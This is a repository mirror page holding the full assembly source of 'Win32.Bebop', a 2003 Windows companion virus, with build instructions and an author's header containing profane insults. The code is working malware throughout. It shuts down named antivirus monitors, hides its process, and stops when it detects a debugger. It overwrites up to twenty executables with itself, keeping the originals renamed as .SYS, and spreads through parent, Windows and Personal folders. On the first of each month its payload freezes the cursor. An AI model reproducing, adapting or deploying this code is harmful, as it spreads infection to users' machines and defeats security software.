mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
634 lines
23 KiB
NASM
634 lines
23 KiB
NASM
COMMENT#
|
|
____________________________________________________________________________________________
|
|
Win32.Bebop - Virus [Companion]
|
|
coded by -DiA- (c)03
|
|
GermanY
|
|
____________________________________________________________________________________________
|
|
|
|
|
|
Intro:
|
|
Yeah! My new creature. This is a Companion Virus (what else?). Ok, I hope you enjoy
|
|
this, and let the CODE speak...
|
|
|
|
|
|
Disclaimer:
|
|
I am NOT responsible for any damage that you do! You can need the code however you want..
|
|
My motherlanguage is not English, I hope you understand what I mean.
|
|
Feel FREE to write any Comments to
|
|
DiA_hates_machine@gmx.de
|
|
|
|
|
|
Infection:
|
|
-infect current directory
|
|
-travel directory's downwards and infect them all
|
|
-go to the Windows folder and infect them
|
|
-go to the Personal folder and infect them
|
|
-infect twenty files per run
|
|
-don't infect again
|
|
|
|
|
|
Features:
|
|
-Anti-Debug
|
|
-Anti-AV-Monitors
|
|
-Anti-Bait
|
|
|
|
|
|
Payload:
|
|
-on the first day every month
|
|
-first show a little message
|
|
-after that the cursor is very slow
|
|
-workz with a thread
|
|
|
|
|
|
Greetz:
|
|
Industry - m8! See on rRLF 3
|
|
Monochrom - thanx for TASM32, you see... ;)
|
|
Weed - thanx for all, my little ganja
|
|
MyCrew - Next month, HARDCORE at Skatehall! Rock on.
|
|
?????? - and to the fucker that send me two or three mails: "Be a Internet Million..
|
|
" FUCK YOU, YOU STUPID MOTHERFUCKER! Don't send me mail's, Son of a Bitch!
|
|
|
|
|
|
First Generation:
|
|
;-----cut-----Bebop666.asm---------------------------------------------------------------
|
|
.386
|
|
.model flat
|
|
jumps
|
|
|
|
extrn MessageBoxA :PROC
|
|
extrn ExitProcess :PROC
|
|
|
|
.data
|
|
oTitle db 'Win32.Bebop - Virus - First Generation',0
|
|
oMsg db 'Yo dood, this is only the first generation',10,13
|
|
db 'from the Bebop - Virus. Have fun, now you',10,13
|
|
db 'are infected...',10,13,10,13
|
|
db ' coded by DiA 03 GermanY',0
|
|
|
|
.code
|
|
FirstGen:
|
|
push 16
|
|
push offset oTitle
|
|
push offset oMsg
|
|
push 0
|
|
call MessageBoxA
|
|
|
|
push 0
|
|
call ExitProcess
|
|
|
|
end FirstGen
|
|
;-----cut--------------------------------------------------------------------------------
|
|
|
|
|
|
Compile:
|
|
First Gen->
|
|
TASM32 /z /ml /m3 Bebop666,,;
|
|
TLINK32 -Tpe -c -aa Bebop666,Bebop666,, import32.lib
|
|
rename Bebop666.EXE Bebop.SYS
|
|
|
|
Virus ->
|
|
TASM32 /z /ml /m3 Bebop,,;
|
|
TLINK32 -Tpe -c -aa Bebop,Bebop,, import32.lib
|
|
|
|
[Bebop.EXE and Bebop.SYS must be in one directory]
|
|
|
|
|
|
Ok, that's it! I write many comment's in the code...
|
|
...HAVE FUN and read my tut's! :)
|
|
|
|
____________________________________________________________________________________________
|
|
____________________________________________________________________________________________
|
|
#
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----HEAD----------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
.386
|
|
.model flat
|
|
jumps
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Needed API's--------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
extrn IsDebuggerPresent :PROC
|
|
extrn GetCurrentProcessId :PROC
|
|
extrn RegisterServiceProcess :PROC
|
|
extrn GetCommandLineA :PROC
|
|
extrn lstrcpyA :PROC
|
|
extrn CreateProcessA :PROC
|
|
extrn CopyFileA :PROC
|
|
extrn FindFirstFileA :PROC
|
|
extrn FindNextFileA :PROC
|
|
extrn SetCurrentDirectoryA :PROC
|
|
extrn RegOpenKeyExA :PROC
|
|
extrn RegQueryValueExA :PROC
|
|
extrn RegCloseKey :PROC
|
|
extrn FindWindowA :PROC
|
|
extrn PostMessageA :PROC
|
|
extrn GetWindowsDirectoryA :PROC
|
|
extrn GetSystemTime :PROC
|
|
extrn CreateThread :PROC
|
|
extrn CloseHandle :PROC
|
|
extrn GetCursorPos :PROC
|
|
extrn SetCursorPos :PROC
|
|
extrn Sleep :PROC
|
|
extrn MessageBoxA :PROC
|
|
extrn ExitProcess :PROC
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Nedded DATA's-------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
.data?
|
|
FILETIME STRUC
|
|
FT_dwLowDateTime dd ?
|
|
FT_dwHighDateTime dd ?
|
|
FILETIME ENDS
|
|
|
|
WIN32_FIND_DATA label byte
|
|
WFD_dwFileAttributes dd ?
|
|
WFD_ftCreationTime FILETIME ?
|
|
WFD_ftLastAccessTime FILETIME ?
|
|
WFD_ftLastWriteTime FILETIME ?
|
|
WFD_nFileSizeHigh dd ?
|
|
WFD_nFileSizeLow dd ?
|
|
WFD_dwReserved0 dd ?
|
|
WFD_dwReserved1 dd ?
|
|
WFD_szFileName db 260d dup (?)
|
|
WFD_szAlternateFileName db 13 dup (?)
|
|
WFD_szAlternateEnding db 03 dup (?)
|
|
|
|
SYSTEMTIME:
|
|
wYear WORD ?
|
|
wMonth WORD ?
|
|
wDayOfWeek WORD ?
|
|
wDay WORD ?
|
|
wHour WORD ?
|
|
wMinute WORD ?
|
|
wSecond WORD ?
|
|
wMilliseconds WORD ?
|
|
|
|
POINT:
|
|
x DWORD ?
|
|
y DWORD ?
|
|
|
|
|
|
VirusFile db 260d dup (?)
|
|
HostFile db 260d dup (?)
|
|
TargetFile db 260d dup (?)
|
|
|
|
ProcessInfo dd 4 dup (?)
|
|
StartupInfo dd 4 dup (?)
|
|
|
|
PersonalFolder db 260d dup (?)
|
|
WindowsFolder db 260d dup (?)
|
|
|
|
.data
|
|
AVP db 'AVP Monitor',0
|
|
McAfee db 'McAfee VShield',0
|
|
Solomon db 'SCAN32',0
|
|
FProt db 'FP-WIN',0
|
|
Norton db 'NAVAPW32',0
|
|
|
|
FindHandle dd 0
|
|
RegHandle dd 0
|
|
lpType dd 0
|
|
ThreadID dd 0
|
|
|
|
FileMask db '*.EXE',0
|
|
FileCounter db 20
|
|
|
|
Size dd 260d
|
|
|
|
ShellFolders db '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
|
|
Personal db 'Personal',0
|
|
|
|
oTitle db 'Win32.Bebop - Virus',0
|
|
oMsg db 'Yeah! Bebop get''s you. Don''t be angry, this nice',10,13
|
|
db 'Virus don''t have any DESTRUCTIVE CODE!',10,13
|
|
db 'Or for stupid people: Wait a while, next day the',10,13
|
|
db 'Bebop-Virus go away...',10,13,10,13
|
|
db ' Win32.Bebop coded by DiA (c)2003 [GermanY]',0
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Win32.Bebop starts--------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
.code
|
|
Bebop:
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Fuck some AV-Monitors-----------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
call AntiDebugger ;check for debugger
|
|
|
|
mov esi,offset AVP
|
|
call KillMonitor ;kill the window
|
|
|
|
mov esi,offset McAfee
|
|
call KillMonitor ;kill the window
|
|
|
|
mov esi,offset Solomon
|
|
call KillMonitor ;kill the window
|
|
|
|
mov esi,offset FProt
|
|
call KillMonitor ;kill the window
|
|
|
|
mov esi,offset Norton
|
|
call KillMonitor ;kill the window
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Hide the Bebop Process----------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
call GetCurrentProcessId ;get id to hide the Bebop
|
|
|
|
push 1 ;register as "SystemService"
|
|
push eax ;ProcessID
|
|
call RegisterServiceProcess
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Restore Hostname & Run Host-----------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
call GetCommandLineA ;looks like "C:\MyC00lPr0gZ\veryCool\Fucking.EXE"
|
|
|
|
inc eax ;fuck the "
|
|
push eax
|
|
push offset VirusFile ;copy it to VirusFile to work with it
|
|
call lstrcpyA ;copy the string
|
|
|
|
mov esi,offset VirusFile
|
|
call GetPoint ;get the point (...ddd.EXE") to clear "
|
|
mov dword ptr [esi+4],00000000h ;fuck it, now we have the path of the VirusFile
|
|
|
|
push offset VirusFile ;copy path of VirusFile to
|
|
push offset HostFile ;HostFile, to work with it
|
|
call lstrcpyA
|
|
|
|
mov esi,offset HostFile
|
|
call GetPoint ;get point to rename it
|
|
mov dword ptr [esi],5359532Eh ; SYS. ,now we have the path of the HostFile
|
|
|
|
call AntiDebugger ;check for debugger
|
|
|
|
xor eax,eax ;null
|
|
push offset ProcessInfo
|
|
push offset StartupInfo
|
|
push eax
|
|
push eax
|
|
push 10h ;create a new process
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push offset HostFile ;path for HostFile
|
|
push offset HostFile ;run this file
|
|
call CreateProcessA
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Travel Directorys & Infect them-------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
mov esi,offset HostFile ;don't need anymore, use it to get the directory
|
|
call GetPoint ;first get the point
|
|
mov ebx,esi ;first get the path of current dir
|
|
call CDdotdot ;-"-
|
|
call InfectFiles ;and infect files in this directory
|
|
|
|
InfectCDdotdot:
|
|
call CDdotdot ;cd..
|
|
test ebx,ebx ;error code?
|
|
jz InfectNext ;if yes search other dir's
|
|
|
|
call InfectFiles ;infect it!
|
|
jmp InfectCDdotdot ;cd.. , infect, cd.. , ...
|
|
|
|
InfectNext: ;other directorys
|
|
call AntiDebugger ;often!
|
|
|
|
push 260d
|
|
push offset WindowsFolder ;save there
|
|
call GetWindowsDirectoryA ;easyer to get it with api, not registry
|
|
|
|
mov esi,offset WindowsFolder ;set directory
|
|
call SetDirectory
|
|
call InfectFiles ;and infect them
|
|
|
|
call GetPersonalDir ;infect them too
|
|
mov esi,offset PersonalFolder ;to set the directory
|
|
call SetDirectory ;set it
|
|
call InfectFiles ;infect them
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Payload, if Day 1. of Month-----------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
push offset SYSTEMTIME ;structure
|
|
call GetSystemTime ;get time
|
|
|
|
cmp word ptr [wDay],1 ;first day of mounth?
|
|
jne FuckingDebugger ;if not exit
|
|
|
|
push offset ThreadID ;the ID
|
|
push 0
|
|
push 0
|
|
push offset StopCursor ;the pklace where are the thread
|
|
push 0
|
|
push 0
|
|
call CreateThread
|
|
|
|
push eax ;close da handle
|
|
call CloseHandle ;close it
|
|
|
|
GetCurrentPos: ;get current cursor pos
|
|
push offset POINT ;structure
|
|
call GetCursorPos
|
|
jmp GetCurrentPos ;again and again
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Exit & stay (sic)---------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
FuckingDebugger:
|
|
push 0
|
|
call ExitProcess
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Infect Files Procedure----------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
InfectFiles: ;procedure
|
|
call AntiDebugger ;fuck you!
|
|
|
|
push offset WIN32_FIND_DATA ;Win32 find data is kewl
|
|
push offset FileMask ;'*.EXE',0
|
|
call FindFirstFileA ;find first
|
|
mov dword ptr [FindHandle],eax ;save da handle
|
|
|
|
FindNext:
|
|
test eax,eax ;error?
|
|
jz FindMore ;check other directory's
|
|
|
|
push offset WFD_szFileName ;copy filename of founded file
|
|
push offset TargetFile ;to rename and copy it
|
|
call lstrcpyA
|
|
|
|
xor eax,eax ;null
|
|
mov esi,offset TargetFile ;is it bait?
|
|
mov edi,esi
|
|
mov ecx,48d ;0
|
|
|
|
CheckBait: ;check for bait
|
|
lodsb ;load one byte
|
|
|
|
CheckNum: ;check for a digit
|
|
cmp eax,46d ; point?
|
|
je Bait ;don't infect, it's a fucking bait
|
|
|
|
cmp eax,ecx ;a number?
|
|
je ScanNext ;scan next digit
|
|
|
|
cmp eax,57d ;over 9
|
|
ja NoBait ;it's no bait, ...infect them
|
|
|
|
inc ecx ;check next number (0,1,2,3,4,...)
|
|
jmp CheckNum ;again
|
|
|
|
ScanNext: ;scan next place
|
|
stosb ;save the byte (edi,esi +1)
|
|
mov ecx,48d ;restore ecx
|
|
jmp CheckBait ;check ma
|
|
|
|
NoBait: ;go on with infection
|
|
|
|
mov esi,offset TargetFile ;find point to rename
|
|
call GetPoint
|
|
mov dword ptr [esi],5359532Eh ;rename to .SYS
|
|
|
|
push 1 ;don't copy if file allready exist
|
|
push offset TargetFile ;copy to this path and filename (TargetFile.SYS)
|
|
push offset WFD_szFileName ;the real name to the fake name
|
|
call CopyFileA
|
|
|
|
test eax,eax ;error -> file already exist
|
|
jz FindNextPhile ;jmp
|
|
|
|
push 0 ;copy always
|
|
push offset WFD_szFileName ;copy the VirusFile over the real File
|
|
push offset VirusFile ;now HostName: xxx.SYS VirusName: xxx.EXE
|
|
call CopyFileA
|
|
|
|
dec byte ptr [FileCounter] ;counter -1
|
|
cmp byte ptr [FileCounter],0 ;zero?
|
|
jz FuckingDebugger ;if yes exist
|
|
|
|
FindNextPhile:
|
|
call AntiDebugger ;antiman
|
|
|
|
Bait: ;search next file, last was a bait
|
|
push offset WIN32_FIND_DATA ;get info from Win32FindData
|
|
push dword ptr [FindHandle] ;handle of file we search...
|
|
call FindNextFileA
|
|
jmp FindNext ;go up!
|
|
|
|
FindMore:
|
|
ret ;return and search in other directory's
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Anti Debug Procedure------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
AntiDebugger:
|
|
call IsDebuggerPresent ;check for Debugger
|
|
test eax,eax ;if yes jmp to...
|
|
jnz FuckingDebugger ;FuckingDebugger:
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Get Point Procedure-------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
GetPoint: ;procedure
|
|
cmp byte ptr [esi],'.' ;check for point
|
|
jz FoundPoint ;if point, return
|
|
inc esi ;if not check next place
|
|
jmp GetPoint
|
|
FoundPoint:
|
|
call AntiDebugger
|
|
ret ;return
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----CD.. Procedure------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
CDdotdot: ;procedure
|
|
GetSlash: ;'\'
|
|
cmp byte ptr [ebx],'\'
|
|
jz ClearAfter ;if yes, clear al after the \
|
|
|
|
cmp byte ptr [ebx],':' ; are we at C:\
|
|
jz SetError ;set a error code and exit procedure
|
|
|
|
dec ebx ;esi -1
|
|
jmp GetSlash ;search again
|
|
|
|
ClearAfter: ;clear all after the slash
|
|
inc ebx ;but don't clear \ (needed to travel!)
|
|
mov dword ptr [ebx],00000000h ;fuck it all, fuck this world, fuck everything th...
|
|
sub ebx,2 ;go in front of \
|
|
|
|
mov esi,offset HostFile ;now a path for the directory cd..
|
|
|
|
SetDirectory: ;procedure
|
|
push esi
|
|
call SetCurrentDirectoryA ;set the dir
|
|
ret ;return
|
|
|
|
SetError: ;we are at C:, can't cd.. anymore
|
|
xor ebx,ebx ;zero
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Read Personal Directory from Registry Procedure---------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
GetPersonalDir: ;procedure
|
|
push offset RegHandle ;save there the handle
|
|
push 001F0000h ;read and write
|
|
push 0
|
|
push offset ShellFolders ;subkey
|
|
push 80000003h ;HKEY_...
|
|
call RegOpenKeyExA ;open the subkey
|
|
|
|
test eax,eax ;error?
|
|
jnz RegError ;set error code and return
|
|
|
|
push offset Size ;260d
|
|
push offset PersonalFolder ;save the value there
|
|
push offset lpType ;fuck off
|
|
push 0
|
|
push offset Personal ;value name
|
|
push dword ptr [RegHandle] ;handle from subkey
|
|
call RegQueryValueExA ;read!
|
|
|
|
RegError: ;error!
|
|
call AntiDebugger
|
|
|
|
push dword ptr [RegHandle] ;close reg
|
|
call RegCloseKey
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Anti AV-Monitor Procedure-------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
KillMonitor:
|
|
call AntiDebugger
|
|
|
|
push esi ;offset to monitor name
|
|
push 0
|
|
call FindWindowA ;find it
|
|
|
|
test eax,eax ;error?
|
|
jz FuckNextMonitor ;return
|
|
|
|
push 0
|
|
push 0
|
|
push 12h ;WM_QUIT = kill
|
|
push eax ;handle of window
|
|
call PostMessageA ;shot 'em up
|
|
|
|
FuckNextMonitor:
|
|
ret ;return
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Stop the Cursor Procedure-------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
StopCursor:
|
|
push 16
|
|
push offset oTitle
|
|
push offset oMsg
|
|
push 0
|
|
call MessageBoxA
|
|
|
|
call AntiDebugger
|
|
|
|
SleepStop:
|
|
push 2000d ;sleep 2sek
|
|
call Sleep
|
|
|
|
xor edx,edx
|
|
StopIt:
|
|
cmp edx,4000d
|
|
je SleepStop
|
|
|
|
push dword ptr [y] ;y coor
|
|
push dword ptr [x] ;x coor
|
|
call SetCursorPos ;stop it
|
|
|
|
inc edx
|
|
jmp StopIt ;stop again
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-------------------------------------------------------------------------------------------
|
|
;-----Win32.Bebop ends----------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
end Bebop
|
|
;-------------------------------------------------------------------------------------------
|
|
;-------------------------------------------------------------------------------------------
|
|
;------------------------------------------------------------------------Germany2003-------- |